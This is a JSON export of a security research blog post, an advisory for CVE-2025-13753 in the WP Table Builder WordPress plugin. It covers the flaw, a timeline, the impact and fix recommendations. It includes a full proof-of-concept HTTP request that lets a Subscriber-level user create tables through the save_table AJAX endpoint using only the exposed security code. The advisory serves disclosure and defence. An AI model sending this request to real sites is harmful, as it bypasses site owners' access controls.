{"id":3522,"date":"2026-03-12T05:39:37","date_gmt":"2026-03-12T05:39:37","guid":{"rendered":"https:\/\/research.cleantalk.org\/?p=3522"},"modified":"2026-03-12T05:39:37","modified_gmt":"2026-03-12T05:39:37","slug":"cve-2025-13753","status":"publish","type":"post","link":"https:\/\/research.cleantalk.org\/cve-2025-13753\/","title":{"rendered":"CVE-2025-13753\u00a0&#8211; WP Table Builder &#8211; Incorrect Authorization to Authenticated (Subscriber+) Arbitrary Table Creation &#8211; POC"},"content":{"rendered":"\n<p>CVE-2025-13753 affects WP Table Builder and it is an incorrect authorization vulnerability where a low privilege authenticated user can create new tables even when the site owner configured the plugin to allow table management only for specific roles. The bug is subtle because the plugin does have an authorization model and a dedicated allowed roles gate, yet one AJAX entry point introduces an alternative access path that relies only on possession of a nonce like value and skips the capability check entirely. 
In practical terms this means\u00a0<strong>a Subscriber can perform a privileged content creation action<\/strong>\u00a0as soon as they can see or steal the security code that is exposed in front end or editor context, which breaks the expected role separation that administrators rely on in multi user WordPress installations.<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>CVE<\/td><td><strong>CVE-2025-13753<\/strong><\/td><\/tr><tr><td>Plugin Version<\/td><td><a href=\"https:\/\/wordpress.org\/plugins\/wp-table-builder\/advanced\/\">WP Table Builder &lt;= 2.0.19<\/a><\/td><\/tr><tr><td>All Time<\/td><td><strong>2 071 567<\/strong><\/td><\/tr><tr><td>Active installations<\/td><td><strong>50 000+<\/strong><\/td><\/tr><tr><td>Publicly Published<\/td><td>January 8, 2026<\/td><\/tr><tr><td>Last Updated<\/td><td>January 8, 2026<\/td><\/tr><tr><td>Researcher<\/td><td>Dmitrii Ignatyev<\/td><\/tr><tr><td>PoC<\/td><td>Yes<\/td><\/tr><tr><td>Exploit<\/td><td>No<\/td><\/tr><tr><td>Reference <\/td><td><a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2025-13753\">https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2025-13753<\/a><br><a href=\"https:\/\/www.wordfence.com\/threat-intel\/vulnerabilities\/wordpress-plugins\/wp-table-builder\/wp-table-builder-2019-incorrect-authorization-to-authenticated-subscriber-arbitrary-table-creation\">https:\/\/www.wordfence.com\/threat-intel\/vulnerabilities\/wordpress-plugins\/wp-table-builder\/wp-table-builder-2019-incorrect-authorization-to-authenticated-subscriber-arbitrary-table-creation<\/a><br><a href=\"https:\/\/t.me\/cleantalk_researches\/384\">https:\/\/t.me\/cleantalk_researches\/384<\/a><\/td><\/tr><tr><td>Plugin Security Certification by CleanTalk<\/td><td> <img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" class=\"wp-image-15\" style=\"width: 150px;\" src=\"https:\/\/research.cleantalk.org\/wp-content\/uploads\/2023\/10\/New_1_not_safe-1.png\" alt=\"\"><br><a 
href=\"https:\/\/blog.cleantalk.org\/wp-content\/uploads\/2023\/09\/New_1_not_safe-1-1.webp\"><\/a><\/td><\/tr><tr><td>Logo of the plugin<\/td><td><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" class=\"wp-image-3523\" style=\"width: 150px;\" src=\"https:\/\/research.cleantalk.org\/wp-content\/uploads\/2026\/03\/icon-256x256-12.png\" alt=\"\"><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Timeline<\/strong><\/h2>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>November 18, 2025<\/td><td>Plugin testing and vulnerability detection in the <strong>WP Table Builder<\/strong> have been completed<\/td><\/tr><tr><td>November 18, 2025<\/td><td>I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing<\/td><\/tr><tr><td>January 8, 2026<\/td><td>Registered 
<strong>CVE-2025-13753<\/strong><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Discovery of the Vulnerability<\/strong><\/h2>\n\n\n\n<p>The vulnerable surface is the AJAX endpoint\u00a0<code>save_table<\/code>\u00a0exposed through\u00a0<code>admin-ajax.php?action=save_table<\/code>. The plugin intends to restrict table creation to roles listed under its Allowed Roles configuration and internally models that policy through a dedicated meta capability gate. However, the\u00a0<code>save_table<\/code>\u00a0implementation accepts a request that includes\u00a0<code>security_code<\/code>\u00a0and treats that value as sufficient authorization, verifying only that the request carries the correct import security nonce and then proceeding to create the table. The missing piece is a server side capability enforcement step like\u00a0<code>current_user_can<\/code>\u00a0against the plugin\u2019s allowed roles meta capability. This creates a classic bypass where the security code becomes a bearer token, even though it was never meant to be an access control boundary, and the policy defined by the plugin UI is silently ignored for this specific mutation path.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Understanding Incorrect Authorization Attacks<\/strong><\/h2>\n\n\n\n<p>In WordPress, nonces and localized security codes are request integrity controls, not access control decisions. They help prevent CSRF and blind submissions by tying a request to a session and screen context, but they do not determine whether a user is allowed to perform an action on the server. Real world failures happen when plugin developers treat a nonce as if it were a capability check. This is especially risky in builder style plugins because editor pages often localize configuration objects into JavaScript, and those objects can be read by any role that can load the page, or sometimes by any visitor if the object is printed on public pages. 
Once a low privilege role can retrieve\u00a0<code>WPTB_CFG.SECURITY_CODE<\/code>, they can call the endpoint directly without any UI. The immediate harm may look like simple clutter, but the deeper problem is that it enables\u00a0<strong>unauthorized content injection into a trusted plugin content type<\/strong>, which often becomes a stepping stone to more serious outcomes if any downstream rendering path mishandles stored content.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Exploiting the Incorrect Authorization Vulnerability<\/strong><\/h2>\n\n\n\n<p>To exploit <strong>CVE-2025-13753<\/strong>, an attacker with Subscriber+ session cookies sends the following request:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><strong>POC<\/strong>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">POST \/wordpress\/wp-admin\/admin-ajax.php?action=save_table HTTP\/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:140.0) Gecko\/20100101 Firefox\/140.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: http:\/\/127.0.0.1\/\nConnection: keep-alive\nCookie: REDACTED\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: cross-site\nSec-Fetch-User: ?1\nPriority: u=0, i\nContent-Type: application\/json\nContent-Length: 180\n\n{\n  \"security_code\": \"WPTB_CFG.SECURITY_CODE from profile.php\",\n  \"title\": \"PoC\",\n  \"content\": \"{\\\"props\\\":{\\\"cols\\\":1,\\\"rows\\\":1},\\\"rows\\\":[{\\\"cells\\\":[{\\\"props\\\":{\\\"isEmpty\\\":false},\\\"blocks\\\":[]}]}]}\"\n}\n<\/code><\/pre>\n<\/blockquote>\n\n\n\n<p>The primary impact is integrity and governance loss. 
Administrators may believe that only selected roles can create and manage tables, but a Subscriber can still create objects behind the scenes, filling the database with unwanted tables and forcing cleanup. On content driven sites, this can become a workflow disruption because tables might appear in editor search or shortcodes lists, confusing staff and increasing the chance that an unreviewed table is embedded into a page. The more serious scenario is chaining. If the table content renderer later outputs stored content with insufficient sanitization, unauthorized table creation becomes an enabler for stored XSS or HTML injection that can fire in admin or front end contexts. Even if WP Table Builder sanitizes well, the bypass still matters because it undermines the plugin\u2019s security model and expands the set of users who can store complex structured data, which is exactly the type of asset attackers prefer for planting payloads and persistence.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong><strong>Recommendations for Improved Security<\/strong><\/strong><\/h2>\n\n\n\n<p>The fix is to enforce authorization on the server for every mutation endpoint, including save_table. The handler should require the plugin\u2019s allowed roles meta capability and call\u00a0<code>current_user_can<\/code>\u00a0before proceeding, and it should treat the security code only as a request authenticity check rather than an authorization decision. If the plugin supports different permission tiers, the capability should be granular and aligned with the Allowed Roles configuration, and the check should occur before any parsing of attacker supplied JSON to reduce attack surface. It is also important to scope the security code so it is never printed for users who are not allowed to manage tables, and to avoid exposing it on public pages entirely. 
Site owners should review who can access pages that expose\u00a0<code>WPTB_CFG.SECURITY_CODE<\/code>, rotate any relevant nonces by logging users out if needed, and audit the tables list for unexpected objects created by low privilege accounts.<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>By taking proactive measures to address Incorrect Authorization vulnerabilities like <strong>CVE-2025-13753<\/strong>, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.<\/p>\n\n\n\n<p>#WordPressSecurity #IncorrectAuthorization #WebsiteSafety #StayProtected #HighVulnerability<\/p>\n\n\n\n<p><strong>Use <a href=\"https:\/\/wordpress.org\/plugins\/security-malware-firewall\/\">CleanTalk<\/a> solutions to improve the security of your website<\/strong><\/p>\n<cite>Dmitrii I.<\/cite><\/blockquote>\n","protected":false},"excerpt":{"rendered":"<p>CVE-2025-13753 affects WP Table Builder and it is an incorrect authorization vulnerability where a low privilege authenticated user can create new tables even when the site owner configured the plugin to allow table management only for specific roles. The bug is subtle because the plugin does have an authorization model and a dedicated allowed roles gate, yet one AJAX entry point introduces an alternative access path that relies only on possession of a nonce like value and skips the capability check entirely. 
In practical terms this means\u00a0a Subscriber can perform a privileged content creation action\u00a0as soon as they can see or steal the security code that is exposed in front end or editor context, which breaks the expected role separation that administrators rely on in multi user WordPress installations.<\/p>\n","protected":false},"author":2,"featured_media":15,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,1],"tags":[],"class_list":["post-3522","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cve","category-security","","tg-column-two"]}